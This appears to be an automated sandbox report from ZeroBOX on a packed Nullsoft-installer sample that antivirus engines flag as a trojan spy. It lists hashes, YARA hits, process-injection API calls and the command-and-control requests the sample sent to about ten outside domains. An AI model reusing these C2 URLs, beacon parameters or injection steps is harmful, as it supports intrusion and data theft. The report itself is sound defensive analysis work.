popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

regasm.exe

  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 March 31, 2021, 6:11 p.m. March 31, 2021, 6:25 p.m.
Size 216.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 489955bed03869f71b4f9639f2566905
SHA256 40628d32ef0746f397d0d41b839530eae24d249dd2f414450a8d9dda03741d10
CRC32 CEDEDDCF
ssdeep 3072:nTs3BxJNmJNV8GhNhDh09Ixfbewvm0C46i0MZA47zb6zDX0at7XO7tXYsne3X4Cd:nAPXGbpG9IxzsMZjzb6P0BdYFX4o
Yara
  • PE_Header_Zero - PE File Signature Zero
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_private_profile - Affect private profile
  • win_files_operation - Affect private profile
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • IsPacked - Entropy Check
  • HasOverlay - Overlay Check
  • HasRichSignature - Rich Signature Check

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.yewanfuli.com/jzvu/?FdC0=IEU8I0/tC6F/KCdEy+3/+7TFP6YUv7z1v1o/e0OOy/mVFqBoYKwLag6wZyS58s3EZzGxSPgy&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.mehmederdas.com/jzvu/?FdC0=eS033VqPyoDF1zl9RuFOGLLaI3YhNk5+wD8xuEKzccVT7RWN/GB5mzOJ4PQDJsdZB3hWq1Hx&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.itsukayamamura.com/jzvu/?FdC0=tXKXxSCKjoInrmbVUNYn4wBm5+rRDXtUTNx6DO+yunu9lqQxuOQDcGa4mcfxTJOlXXG65LJj&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.fountainhead410.com/jzvu/?FdC0=gPJmkLd5Iumt7+/kXloFFkASjT6JhxFOIwMVszm/38cgqTBuSKrIjhSH0WtLGx7FJukKw9E+&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.thekeycrewshop.com/jzvu/?FdC0=WyqCxff5WYuDUI3l9SqtE/vqx1o9agmUmA0/6uOuL0r1THlvHyo6aOjySaUbyyuDkZGnIHS8&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.hippopotames-consultants.com/jzvu/?FdC0=boZgPmLpFlFruuJbAFnB0agXJz3TKQ2lWJ53yKL54RNh00xL8F6K364TN2s9+osNSchaCIqx&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.theoneandonlytattoostudio.com/jzvu/?FdC0=j2v8V70Ofxp4tvniEIa0jhRWZtem+iS9b/3BksfFj+bGaZSgxqBisQW1hEAQPC+xRThK68Z9&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.maxicreamheladeriafruteria.com/jzvu/?FdC0=xbv2RQqqOaEgJ4A3qLW2S3SVCDfKq7jP/K9ZMoRCkZfjCxPnch7MeD0Q3EOjQvWoRnx5agTa&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.amarisworstell.com/jzvu/?FdC0=dswBW2wHvZfOAOH0mnQD6UmhvD38CbU2VkWxxFHWQjFgaxhGJnyTAXuLwfnW9ywlE8zP3Qih&Bj=9r4L1
suspicious_features GET method with no useragent header suspicious_request GET http://www.standingrockcellars.com/jzvu/?FdC0=wsn9Q3qXtDODN5Y82e8sp90wlLBhDD+MWEMyCKCB+Re0ld07vmM6+0vxuCG3AIjCnPE7bSPi&Bj=9r4L1
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2?cup2key=10:2761306227&cup2hreq=8d2177a275c6a2ed31370f3125f657a4cd2ced7eedb1fda03dd4d7426fce0edd
suspicious_features POST method with no referer header suspicious_request POST https://update.googleapis.com/service/update2
request POST http://www.yewanfuli.com/jzvu/
request GET http://www.yewanfuli.com/jzvu/?FdC0=IEU8I0/tC6F/KCdEy+3/+7TFP6YUv7z1v1o/e0OOy/mVFqBoYKwLag6wZyS58s3EZzGxSPgy&Bj=9r4L1
request POST http://www.mehmederdas.com/jzvu/
request GET http://www.mehmederdas.com/jzvu/?FdC0=eS033VqPyoDF1zl9RuFOGLLaI3YhNk5+wD8xuEKzccVT7RWN/GB5mzOJ4PQDJsdZB3hWq1Hx&Bj=9r4L1
request POST http://www.itsukayamamura.com/jzvu/
request GET http://www.itsukayamamura.com/jzvu/?FdC0=tXKXxSCKjoInrmbVUNYn4wBm5+rRDXtUTNx6DO+yunu9lqQxuOQDcGa4mcfxTJOlXXG65LJj&Bj=9r4L1
request HEAD http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
request GET http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
request POST http://www.fountainhead410.com/jzvu/
request GET http://www.fountainhead410.com/jzvu/?FdC0=gPJmkLd5Iumt7+/kXloFFkASjT6JhxFOIwMVszm/38cgqTBuSKrIjhSH0WtLGx7FJukKw9E+&Bj=9r4L1
request POST http://www.thekeycrewshop.com/jzvu/
request GET http://www.thekeycrewshop.com/jzvu/?FdC0=WyqCxff5WYuDUI3l9SqtE/vqx1o9agmUmA0/6uOuL0r1THlvHyo6aOjySaUbyyuDkZGnIHS8&Bj=9r4L1
request POST http://www.hippopotames-consultants.com/jzvu/
request GET http://www.hippopotames-consultants.com/jzvu/?FdC0=boZgPmLpFlFruuJbAFnB0agXJz3TKQ2lWJ53yKL54RNh00xL8F6K364TN2s9+osNSchaCIqx&Bj=9r4L1
request POST http://www.theoneandonlytattoostudio.com/jzvu/
request GET http://www.theoneandonlytattoostudio.com/jzvu/?FdC0=j2v8V70Ofxp4tvniEIa0jhRWZtem+iS9b/3BksfFj+bGaZSgxqBisQW1hEAQPC+xRThK68Z9&Bj=9r4L1
request POST http://www.maxicreamheladeriafruteria.com/jzvu/
request GET http://www.maxicreamheladeriafruteria.com/jzvu/?FdC0=xbv2RQqqOaEgJ4A3qLW2S3SVCDfKq7jP/K9ZMoRCkZfjCxPnch7MeD0Q3EOjQvWoRnx5agTa&Bj=9r4L1
request POST http://www.amarisworstell.com/jzvu/
request GET http://www.amarisworstell.com/jzvu/?FdC0=dswBW2wHvZfOAOH0mnQD6UmhvD38CbU2VkWxxFHWQjFgaxhGJnyTAXuLwfnW9ywlE8zP3Qih&Bj=9r4L1
request POST http://www.standingrockcellars.com/jzvu/
request GET http://www.standingrockcellars.com/jzvu/?FdC0=wsn9Q3qXtDODN5Y82e8sp90wlLBhDD+MWEMyCKCB+Re0ld07vmM6+0vxuCG3AIjCnPE7bSPi&Bj=9r4L1
request POST https://update.googleapis.com/service/update2?cup2key=10:2761306227&cup2hreq=8d2177a275c6a2ed31370f3125f657a4cd2ced7eedb1fda03dd4d7426fce0edd
request POST https://update.googleapis.com/service/update2
request POST http://www.yewanfuli.com/jzvu/
request POST http://www.mehmederdas.com/jzvu/
request POST http://www.itsukayamamura.com/jzvu/
request POST http://www.fountainhead410.com/jzvu/
request POST http://www.thekeycrewshop.com/jzvu/
request POST http://www.hippopotames-consultants.com/jzvu/
request POST http://www.theoneandonlytattoostudio.com/jzvu/
request POST http://www.maxicreamheladeriafruteria.com/jzvu/
request POST http://www.amarisworstell.com/jzvu/
request POST http://www.standingrockcellars.com/jzvu/
request POST https://update.googleapis.com/service/update2?cup2key=10:2761306227&cup2hreq=8d2177a275c6a2ed31370f3125f657a4cd2ced7eedb1fda03dd4d7426fce0edd
request POST https://update.googleapis.com/service/update2
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 4456
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 12288
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10009000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 3500
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00850000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\nspC0.tmp\zi91tc7njdwau6u.dll
file C:\Users\test22\AppData\Local\Temp\nspC0.tmp\zi91tc7njdwau6u.dll
Time & API Arguments Status Return Repeated

Process32NextW

 snapshot_handle: 0x000001ec
process_name: mobsync.exe
process_identifier: 3220
1 1 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name: pw.exe
process_identifier: 8588
1 1 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name: slui.exe
process_identifier: 4244
1 1 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name: cmd.exe
process_identifier: 7948
1 1 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name: conhost.exe
process_identifier: 6704
1 1 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name: pw.exe
process_identifier: 4864
1 1 0

Process32NextW

 snapshot_handle: 0x000001ec
process_name: regasm.exe
process_identifier: 4456
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
MicroWorld-eScan Gen:Variant.Jaik.44831
FireEye Gen:Variant.Jaik.44831
Sangfor Trojan.Win32.Save.a
Arcabit Trojan.Jaik.DAF1F
Cyren W32/Agent.CMD.gen!Eldorado
Symantec ML.Attribute.HighConfidence
APEX Malicious
Kaspersky UDS:Trojan-Spy.Win32.Noon.gen
BitDefender Gen:Variant.Jaik.44831
Paloalto generic.ml
Ad-Aware Gen:Variant.Jaik.44831
McAfee-GW-Edition BehavesLike.Win32.Dropper.dc
Microsoft Trojan:Win32/Wacatac.B!ml
GData Gen:Variant.Jaik.44831
Ikarus Trojan.NSIS.Agent
Fortinet W32/Injector.EOLV!tr
Process injection Process 4456 called NtSetContextThread to modify thread in remote process 3500
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 2000355780
registers.esp: 1638384
registers.edi: 0
registers.eax: 4313344
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 3500
1 0 0